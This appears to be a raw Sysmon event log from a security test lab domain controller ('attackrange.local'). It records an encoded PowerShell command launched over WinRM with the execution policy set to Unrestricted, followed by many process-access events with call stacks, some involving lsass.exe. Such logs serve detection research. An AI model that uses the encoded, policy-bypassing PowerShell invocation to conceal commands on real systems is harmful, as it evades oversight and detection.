Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8583-5FCF-B500-000000009101}5080C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.658{10ACEC4A-8541-5FCF-1500-000000009101}13641444C:\Windows\system32\svchost.exe{10ACEC4A-8583-5FCF-B500-000000009101}5080C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.658{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8583-5FCF-B500-000000009101}5080C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8583-5FCF-B500-000000009101}5080C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8583-5FCF-B600-000000009101}4520C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8583-5FCF-B500-000000009101}5080C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8583-5FCF-B500-000000009101}5080C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.646{10ACEC4A-8583-5FCF-B500-000000009101}5080C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 